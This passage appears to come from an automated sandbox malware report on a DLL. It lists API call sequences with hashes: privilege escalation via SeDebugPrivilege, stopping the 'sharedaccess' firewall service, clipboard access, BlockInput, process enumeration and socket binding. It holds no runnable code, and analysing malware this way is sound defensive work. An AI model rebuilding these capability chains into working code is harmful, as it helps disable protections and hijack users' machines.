                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyOpen
                                                  • String ID:
                                                  • API String ID: 3065066218-0
                                                  • Opcode ID: 2862ed5687d03e5c65a8664783a7ab9890a1c27da8607513131cd222ce1fbffd
                                                  • Instruction ID: eef061908f3c3295b15891c3fed615895cfe21d81dbfaa5e572b4fb253c06cc9
                                                  • Opcode Fuzzy Hash: 2862ed5687d03e5c65a8664783a7ab9890a1c27da8607513131cd222ce1fbffd
                                                  • Instruction Fuzzy Hash: 1F1194392406255FF3189B758C9DA6B7BD8FB846A2F19032DF61AC32E0DFA0DC008660
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 1002699D
                                                  • OpenServiceA.ADVAPI32(00000000,sharedaccess,000F01FF), ref: 100269B0
                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 100269BE
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269D3
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269E0
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseHandleProcess$ControlCurrentManagerQueryStatusToken
                                                  • String ID: SeDebugPrivilege$sharedaccess
                                                  • API String ID: 3393504433-1846105483
                                                  • Opcode ID: 8eaf4162f368bf969400c394de0b78a17616764591acc66d43f01c686583a807
                                                  • Instruction ID: c0f4552dcdd8d8dac9f1fa5122cc1ef16548ad70a523b7a742824d19da6b7ded
                                                  • Opcode Fuzzy Hash: 8eaf4162f368bf969400c394de0b78a17616764591acc66d43f01c686583a807
                                                  • Instruction Fuzzy Hash: F2F0F639650124BBE210BB148C8AFFB3E68FF95791F44011AF608A9192EBB458448AB2
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 10017BB2
                                                  • EmptyClipboard.USER32 ref: 10017BBE
                                                  • GlobalAlloc.KERNEL32(00002000,?,?,?), ref: 10017BCE
                                                  • GlobalLock.KERNEL32(00000000), ref: 10017BDC
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 10017BF9
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 10017C02
                                                  • GlobalFree.KERNEL32(00000000), ref: 10017C09
                                                  • CloseClipboard.USER32 ref: 10017C10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                  • String ID:
                                                  • API String ID: 453615576-0
                                                  • Opcode ID: b4994271ed0c5f6ad7c9827fe64acb0f777f19826ff97a28270b989e17eee570
                                                  • Instruction ID: db7201b96ab1820305f6fb52e99ee6ce304ff54deb9d779612551a26aa299f3d
                                                  • Opcode Fuzzy Hash: b4994271ed0c5f6ad7c9827fe64acb0f777f19826ff97a28270b989e17eee570
                                                  • Instruction Fuzzy Hash: 61F036752016219FE7146B604CCCBEF36A8FB48752B490519F90AD6251CB649940C7B1
                                                  Strings
                                                  • *** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100804BE
                                                  • *** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100802CC
                                                  • *** END, xrefs: 1008083B
                                                  • *** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100806E0
                                                  • PVOP, xrefs: 1008022C
                                                  • IVOP, xrefs: 100802F0
                                                  • *** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 10080402
                                                  • *** PFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 10080208, 100807E8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** END$*** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** PFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i$IVOP$PVOP
                                                  • API String ID: 0-467185937
                                                  • Opcode ID: ee86b772b609809ee736de4f70330a89f18dced12b1b8d3ba0daed1abf1d89c4
                                                  • Instruction ID: ab25fbd0ef8073bac7d7b62994b1918f27d9438132fa6d75771ec434641f8f94
                                                  • Opcode Fuzzy Hash: ee86b772b609809ee736de4f70330a89f18dced12b1b8d3ba0daed1abf1d89c4
                                                  • Instruction Fuzzy Hash: FDA226B5A042889FDB68CF18C881BEA77E5FF89344F10861DFD898B351D774AA41CB91
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 100025B8
                                                  • GetClipboardData.USER32(00000001), ref: 100025C6
                                                  • GlobalLock.KERNEL32(00000000), ref: 100025CF
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 10002609
                                                  • CloseClipboard.USER32 ref: 1000260F
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 10002632
                                                  • CloseClipboard.USER32 ref: 10002638
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseUnlock$DataLockOpen
                                                  • String ID:
                                                  • API String ID: 2537359085-0
                                                  • Opcode ID: 80ece2687852f306fd33edd9e14cf1056a4f7933bde801836cb5a50ead5f4239
                                                  • Instruction ID: fa833299b88c5f4a584283747ecb7ea9d0db2f1ad11210ff9961461b47ce4595
                                                  • Opcode Fuzzy Hash: 80ece2687852f306fd33edd9e14cf1056a4f7933bde801836cb5a50ead5f4239
                                                  • Instruction Fuzzy Hash: 0001B5792106145BF3089B358C8DAAB3B98FBC0321F18072AF91B961E1EFE5ED048664
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                  • GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID:
                                                  • API String ID: 3398352648-0
                                                  • Opcode ID: 4016afdebf76fc38c603403ce2775b0087815ffa4e94011ab6c2084e23305a80
                                                  • Instruction ID: 9ea1a39ba13499be5e37f09f5477951cbb04746b7bbf0bdf0a23c0e989a9349b
                                                  • Opcode Fuzzy Hash: 4016afdebf76fc38c603403ce2775b0087815ffa4e94011ab6c2084e23305a80
                                                  • Instruction Fuzzy Hash: AA0144B9654300ABE304EF74CC89FAB77A4FB84700F88891CF64A86290D675D4448B61
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10029105
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000010,00000000,00000000), ref: 1002911D
                                                  • GetLastError.KERNEL32 ref: 10029123
                                                  • CloseHandle.KERNEL32(?), ref: 10029134
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID:
                                                  • API String ID: 3398352648-0
                                                  • Opcode ID: 149c958cf4e409a043c1ff8710811fbd874f2c7f626f077d67b57da5f78a4f18
                                                  • Instruction ID: 4db5a6e2c7b4cb126f103a4b1f94b4cfd3d626149b56619aedb11a4ed5bc1c08
                                                  • Opcode Fuzzy Hash: 149c958cf4e409a043c1ff8710811fbd874f2c7f626f077d67b57da5f78a4f18
                                                  • Instruction Fuzzy Hash: F4018879654310AFE304EB78CC89F9B77A8FB84B00F448A1DF68D96290D775D8048761
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 1001A107
                                                  • CoCreateInstance.OLE32(100EACE0,00000000,00000001,100EACC0,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001A11F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInitializeInstance
                                                  • String ID: FriendlyName
                                                  • API String ID: 3519745914-3623505368
                                                  • Opcode ID: fc36f0c2b445b7de094a84334f3024003ad039596e6c96a13255ec54081baec0
                                                  • Instruction ID: 59d40a70ec8d79e9cb2401fedf0ad3af46c2419484e2d0589d1503d06cb14a4e
                                                  • Opcode Fuzzy Hash: fc36f0c2b445b7de094a84334f3024003ad039596e6c96a13255ec54081baec0
                                                  • Instruction Fuzzy Hash: 06310674248202AFD604CF65CC88F5BB7E8FF89714F148958F549DB250DB74E88ACB62
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000000), ref: 10009C85
                                                  • FindClose.KERNEL32(00000000), ref: 10009D07
                                                  • CloseHandle.KERNEL32(?), ref: 10009D19
                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10009D31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileFind$CreateFirstHandle
                                                  • String ID: p
                                                  • API String ID: 3283578348-2181537457
                                                  • Opcode ID: 5ca221129d8a3a18f25eb801b6ab58ffdf62e839a6ab82df66ebab739c56a846
                                                  • Instruction ID: 2b1597b52ddb8eafb0e91e12b29208ebd2643c3ea00a9cd01ad1c39fb074611e
                                                  • Opcode Fuzzy Hash: 5ca221129d8a3a18f25eb801b6ab58ffdf62e839a6ab82df66ebab739c56a846
                                                  • Instruction Fuzzy Hash: 7631BC719087019BF324DF28CC45B8FB6D6EBC53A0F25461EF1AA873D4D634D4458B41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: bindsocket
                                                  • String ID:
                                                  • API String ID: 3370621091-0
                                                  • Opcode ID: 85dc332e68de125305a9dd3892cc226241b1110390aa54452521c95da12b1cd6
                                                  • Instruction ID: 8e805546ef113c3ac3a2f35078ac83ca8a84d9fad177171d366f9001e7ac871c
                                                  • Opcode Fuzzy Hash: 85dc332e68de125305a9dd3892cc226241b1110390aa54452521c95da12b1cd6
                                                  • Instruction Fuzzy Hash: E8116DB4814311AFE300DF38D8856EABBE4FF89318F444A1DF49CC7290E3B58A458B96
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 10027105
                                                  • Process32First.KERNEL32(00000000,?), ref: 10027112
                                                  • CloseHandle.KERNEL32(00000000,00000000,?), ref: 1002715B
                                                    • Part of subcall function 10026F40: CreateToolhelp32Snapshot.KERNEL32(00000008,?,00000000,00000000,?,00000074), ref: 10026F67
                                                    • Part of subcall function 10026F40: Module32First.KERNEL32(00000000,00000000), ref: 10026F7C
                                                    • Part of subcall function 10026F40: lstrcmpiA.KERNEL32(?,?), ref: 10026F9B
                                                    • Part of subcall function 10026F40: Module32Next.KERNEL32(00000000,00000000), ref: 10026FA7
                                                    • Part of subcall function 10026F40: lstrcmpiA.KERNEL32(?,?), ref: 10026FB9
                                                    • Part of subcall function 10026F40: CloseHandle.KERNEL32(00000000), ref: 10026FC4
                                                  • Process32Next.KERNEL32(00000000,?), ref: 10027150
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateFirstHandleModule32NextProcess32SnapshotToolhelp32lstrcmpi
                                                  • String ID:
                                                  • API String ID: 1584622316-0
                                                  • Opcode ID: 0e47aba4332e876abc14e7755c421cd63b0223f9de7432f19338bccb8822ca76
                                                  • Instruction ID: b3f5742757dc67417d80ccb19e15a7cf549f2a7c7405ea7f21a0163c39de1ff2
                                                  • Opcode Fuzzy Hash: 0e47aba4332e876abc14e7755c421cd63b0223f9de7432f19338bccb8822ca76
                                                  • Instruction Fuzzy Hash: 38F0A4B75002116AE750D764FC82EBB76ECEF84790F864529FD4886141EB29DD1482F2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: exitfprintf
                                                  • String ID: %s
                                                  • API String ID: 4243785698-620797490
                                                  • Opcode ID: cf8ee2fa4aef7182d94046dd8935e8230c32919dd7694b2b22ae75c663505201
                                                  • Instruction ID: 5e5f8386bdea3470b8528b236cfecaaff427fcee2975e6dc988a4cda30a7b734
                                                  • Opcode Fuzzy Hash: cf8ee2fa4aef7182d94046dd8935e8230c32919dd7694b2b22ae75c663505201
                                                  • Instruction Fuzzy Hash: C0E06D3E800111AFD200EBA4EC45EAFB7A8EF8A305F448865F54CA7216D735E94987A6
                                                  APIs
                                                  • BlockInput.USER32(00000000), ref: 1001750C
                                                  • BlockInput.USER32(?,?,?,00000000), ref: 10017528
                                                  • BlockInput.USER32(?), ref: 100175D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
                                                  • Opcode ID: 70d7b4fe06ccd1aeb7d671d919ba715909ed7347f82ce07ad212871d477d66c2
                                                  • Instruction ID: 7c35041cbc989ced744e84bc2fe7d25f999f3a5f95f372f905baf80f1d985716
                                                  • Opcode Fuzzy Hash: 70d7b4fe06ccd1aeb7d671d919ba715909ed7347f82ce07ad212871d477d66c2
